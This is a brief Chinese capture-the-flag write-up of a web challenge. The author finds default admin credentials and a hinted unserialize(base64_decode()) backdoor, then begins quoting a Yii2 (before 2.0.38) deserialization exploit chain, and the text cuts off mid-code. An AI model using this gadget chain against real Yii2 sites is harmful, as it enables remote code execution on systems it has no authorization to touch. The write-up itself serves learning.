思路
进去是一个网页,在login页面试了下密码,发现是admin:admin,成功登录,但发现没什么改变
一个个页面查看源代码,最后再about页面中发现提示
访问?r=site%2Fabout&view-source
拿到提示
///backdoor/shell
unserialize(base64_decode($_GET['code']))
刚开始不知道怎么去用,后面想到%2F就是/
,尝试了下r=/backdoor/shell,提示要加上参数,然后思路又断了,应该是信息收集的不够
用Wappalyzer插件发现用的是Yli框架,又再源码中得知他用的是2.0版本,网上搜下有没有相关漏洞
参考博客:https://blog.csdn.net/xuandao_ahfengren/article/details/111259943中给出的exp,适用于Yii2 2.0.38 之前的版本
<?php
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess = 'phpinfo'